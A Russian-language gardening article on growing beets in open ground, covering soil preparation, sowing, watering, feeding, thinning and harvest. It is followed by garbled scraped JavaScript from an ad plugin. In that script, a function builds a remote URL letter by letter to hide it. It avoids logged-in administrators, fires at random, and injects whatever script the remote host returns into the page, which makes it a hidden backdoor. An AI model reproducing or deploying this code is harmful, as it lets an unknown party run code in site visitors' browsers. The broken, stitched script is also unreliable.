Каждый огородник выращивает свеклу на своем участке. Для получения хорошего урожая необходимо соблюдать правила выращивания свеклы в открытом грунте.

Сегодня речь пойдет о выращивании свеклы в открытом грунте, уход за свёклой от посева семян, полива, прополки и до сбора и хранения урожая. Также рассмотрим основные виды свеклы и условия выращивания этого корнеплода.

Подготовка участка для посадки свеклы

Начинайте подготовку участка ещё осенью: необходимо убрать остатки других растений, внести удобрения (древесная зола) и затем перекопать землю.

Лучшие предшественники для посадки свеклы: огурцы, горох, лук, фасоль, баклажаны.

Не рекомендуем высаживать свеклу после капусты, всех видов свеклы и картофеля.

Участок под свеклу должен быть хорошо освещаем солнцем, свекла не любит затенения. Плоды наберут насыщенный оттенок.

Посадка свеклы в открытый грунт

Весной участок под посадку разрыхлить граблями. Когда земля прогреется выше +5 градусов, можно сеять семена. Не сейте семена в холодный грунт, плоды плохо сформируются, что повлияет на урожай. Оптимальным сроком посадки свеклы в открытый грунт считается середина мая.

Предварительно семена необходимо подготовить, всходы появятся быстрее. Для этого замочить их за сутки до посева в стимуляторе роста или обычной теплой воде. Перед посевом просушить.

Желательно перед посевом семян полить участок. Делаем ряды глубиной до 4 см и расстоянием между ними 25-30 см, обильно пролить борозды водой, как впитается, высевают семена и присыпают почвой.

Следите, чтобы не образовывалась корка на поверхности почвы, семенам трудно будет пробиться через неё. Вовремя рыхлите почву и удаляйте сорняки.

Полив свеклы

Обеспечьте свекле регулярный полив, особенно в первой половине вегетации, в период образования корнеплодов.

В первой половине лета производить полив 1 раз в неделю, из расчета 10 литров на 1 м 2 грядки (под корень и дождеванием).

Начиная с середины июля полив производят 2 раза в неделю тем же количеством воды. Не забывайте рыхлить почву после поливов.

Несколько раз: за месяц и за 2 недели до уборки урожая во время полива добавьте на 10 литров воды 1 столовую ложку поваренной соли. Это добавит свекле сладковатый вкус. Соль можно заменить на натриевую селитру.

За 10-14 дней до сбора урожая полив прекращают, давая корнеплодам подготовится к хранению.

Подкормка свеклы

Подкормку производить после образования 3-4 листочков азотсодержащими удобрениями (например, раствором птичьего помета или раствором коровяка).

Свекла за весь период роста нуждается в азоте, калии и фосфоре. В первой половине вегетации нужны азотные удобрения, во второй половине необходимы калийные удобрения.

Фосфорные удобрения необходимо вносить понемногу в течении всего периода вегетации свеклы.

Во второй половине вегетации в качестве подкормки используйте золу: на ведро воды 1 стакан золы, настоять и поливать с лейки.

Свекла очень любит золу, и даже листья после подкормки приобретают здоровую зеленую окраску. Если листья свеклы посветлели, подкормите свеклу калиевой селитрой (3 столовых ложки на 10 литров воды).

Прореживание свеклы

Свеклу высевают густо, и это делается для её нормального развития. Также, это является мерой против плохой всхожести семян. Поэтому необходимо проводить прореживание. Удобней всего проводить прореживание после полива или обильного дождя.

Первое прореживание проводят в период образования 2 первых полноценных листиков, оставляя расстояние между растениями в 2-3 см.

Второе прореживание проводят, когда на растениях образовалось по 5-6 листиков, оставляя промежуток между растениями в 4-6 см.

В третий раз прореживание необходимо провести до 15 августа, оставив расстояние между растениями в 8-10 см. Соблюдайте сроки прореживания, это немаловажный момент для получения качественного и большого урожая.

Посадка свеклы рассадой

Выращивать свеклу в открытом грунте можно из рассады. За месяц до посадки в открытый грунт начинают сеять семена свеклы в парнике. Проделать бороздки через 5 см друг от друга и посеять семена с расстоянием в 3 см, присыпать землёй.

Через некоторое время появятся ростки. Когда вырастает по 4 листика, рассада готова к пересадке. За 10 дней до посадки на постоянное место проведите закаливание рассады, проветривайте парник. Непосредственно перед посадкой хорошо полейте рассаду.

Видео — Как угодить свекле

Сбор урожая свеклы

Свеклу окучивать нет необходимости (даже при выглядывании корнеплода из земли), так она наберет больше сахаристости и будет слаще. Убрать свеклу необходимо до заморозков. Корнеплоды хранят в подвале, и хорошо сохраняются до самой весны.

Свекла – какой сорт выбрать

Каждая хозяйка для посева выбирает сорт, в зависимости от последующего применения свеклы.

Основные виды свеклы: столовая, сахарная, кормовая.

Для тех огородников, которые держат хозяйство, пригодится кормовая свекла для кормления животных. Этот вид свеклы растет крупным, поэтому при посадке расстояние между рядами делать около 30-35 см.

Столовый сорт отлично подходит в пищу. Сахарную свеклу высаживают для получения сахара.

Соблюдая эти несложные советы по уходу за свеклой, вы сможете получить хороший урожай.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};